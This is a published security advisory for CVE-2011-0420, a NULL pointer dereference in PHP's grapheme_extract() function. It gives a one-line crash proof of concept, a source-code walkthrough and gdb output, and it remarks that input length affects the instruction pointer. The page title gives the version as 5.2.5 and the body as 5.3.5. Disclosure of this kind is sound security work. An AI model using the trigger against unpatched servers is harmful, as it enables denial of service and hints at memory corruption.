PHP 5.2.5 grapheme_extract() NULL Pointer Dereference

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[ PHP 5.3.5 grapheme_extract() NULL Pointer Dereference ]  
  
Author: Maksymilian Arciemowicz  
http://securityreason.com/  
http://cxib.net/  
Date:  
- - Dis.: 09.12.2010  
- - Pub.: 17.02.2011  
  
CVE: CVE-2011-0420  
CERT: VU#210829  
  
Affected Software:  
- - PHP 5.3.5  
  
Fixed: SVN  
  
Original URL:  
http://securityreason.com/achievement_securityalert/94  
  
  
- --- 0.Description ---  
Internationalization extension (further is referred as Intl) is a  
wrapper for ICU library, enabling PHP programmers to perform  
UCA-conformant collation and date/time/number/currency formatting in  
their scripts.  
  
grapheme_extract ? Function to extract a sequence of default grapheme  
clusters from a text buffer, which must be encoded in UTF-8.  
  
  
- --- 1. PoC for grapheme_extract() ---  
grapheme_extract('a',-1);  
  
Change length of first parameter to change rip.  
  
  
- --- 2. grapheme_extract() NULL Pointer Dereference ---  
As we can see in grapheme_extract(str,size)  
  
- -grapheme_extract()--  
...  
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl|llz", (char  
**)&str, &str_len, &size, &extract_type, &lstart, &next) == FAILURE) {  
<=== str='a' and size='-1'  
...  
/* if the string is all ASCII up to size+1 - or str_len whichever is  
first - then we are done.  
(size + 1 because the size-th character might be the beginning of a  
grapheme cluster)  
*/  
  
if ( -1 != grapheme_ascii_check(pstr, size + 1 < str_len ? size + 1 :  
str_len ) ) { <=== ( size=-1+1=0 ) ===  
long nsize = ( size < str_len ? size : str_len ); <=== nsize = -1  
if ( NULL != next ) {  
ZVAL_LONG(next, start+nsize);  
}  
RETURN_STRINGL(((char *)pstr), nsize, 1); <=== CRASH POINT  
}  
...  
- -grapheme_extract()--  
  
if we call to grapheme_ascii_check(pstr,0) where  
  
- -grapheme_ascii_check()--  
/* {{{ grapheme_ascii_check: ASCII check */  
int grapheme_ascii_check(const unsigned char *day, int32_t len) <==== len=0  
{  
int ret_len = len;  
while ( len-- ) {  
if ( *day++ > 0x7f )  
return -1;  
}  
  
return ret_len; <=== return 0  
}  
- -grapheme_ascii_check()--  
  
then we get (int)0 in result and  
  
long nsize = ( size < str_len ? size : str_len );  
  
will be -1. Therefore,  
  
RETURN_STRINGL(((char *)pstr), nsize, 1);  
  
give NULL pointer dereference here.  
  
Changing length of first parameter of grapheme_extract(), we will also  
change rip in memcpy(3).  
  
(gdb) r -r 'grapheme_extract('a',-1);'  
...  
(gdb) x/i $rip  
=> 0x7ffff5511d99 <memcpy+777>: mov %rax,(%rdi)  
(gdb) x/x $rax  
0xf9891857a6e70f70: Cannot access memory at address 0xf9891857a6e70f70  
(gdb) x/x $rdi  
0x11b2000: Cannot access memory at address 0x11b2000  
(gdb) r -r  
'grapheme_extract('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',-1);'  
...  
(gdb) x/i $rip  
=> 0x7ffff5511d77 <memcpy+743>: mov 0x18(%rsi),%r10  
(gdb) x/x $rsi  
0x11b1fe8: 0x00000000  
  
- --- 3. Fix ---  
CVS  
http://svn.php.net/viewvc?view=revision&revision=306449  
  
  
- --- 4. Greets ---  
Pierre, Stas, sp3x, infospec  
  
  
- --- 5. Contact ---  
Author: Maksymilian Arciemowicz [ SecurityReason.com ]  
  
Email:  
- - cxib {a\./t]securityreason[d=t} com  
  
GPG:  
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  
  
http://securityreason.com/  
http://cxib.net/  
  
- --   
Best Regards  
pub 4096R/D6E5B530 2010-09-19  
uid Maksymilian Arciemowicz (cx) <[email protected]>  
sub 4096R/58BA663C 2010-09-19  
-----BEGIN PGP SIGNATURE-----  
  
iQIcBAEBAgAGBQJNXFm7AAoJEIO8+dzW5bUwqowP/iP7Hx8HCvX5YrZk9b1UzU81  
imYH1r7m5Xs0SkPpPeT0UwYH9MTYI04UeD2cskkBwdCTBRNPEQlRNhJIN7WzxjYv  
WGH9vyE7VQD0x3oeSszFRHFdGGQ13qVmfBXJfDk8K1UiLsgabvdr6M69keRB7GqU  
tX/2z97P+hWuEuCmjDcFmqeGwpjxPF+4omupq5BavY6KBQTxjfw3ECLb4gAxYDko  
PC2uKXZ6iEuqHEeUElTpRnQFTCnToKIPRfogCkN9+m8hLcdrnEnGQc1sdxHXgVqk  
nR+RCxA5ph5BO1d3ceQg8e2BpRT9vAIXyQI3UWD5N6O2Go7TO5T3NAdliBe3aVVf  
7Awd3UCdeX50bDLzs55yACAqjinAzOoLVbEKVHBR/S6ogSsNp+4wkkDUhdj8G6s9  
EUEY2qlNBJe5bTenzV5oXgpZ9lPuTSlbRjogdXtmhHBhv3nCIO2kLr0QZ293QsHZ  
TGp/jmhuiu67dIIgtnObZOIckmcYZZukQeOOjThvTqia0dlrOi3QK9/deTISAESc  
HHRMpgz52ptnUTg8G8p0uvpkwa/riW4WE9tXN9LVQxPUmboMcuTrCQ1WMCgQit9R  
i8ALu1+4RJnErC/Q0CdBZcEFnnFxOOoTPSen6SSFRFnY1uwCklGtQPpJdcgXfpBN  
9aCz02ztmFBMPO+/YTzb  
=H8sm  
-----END PGP SIGNATURE-----  
`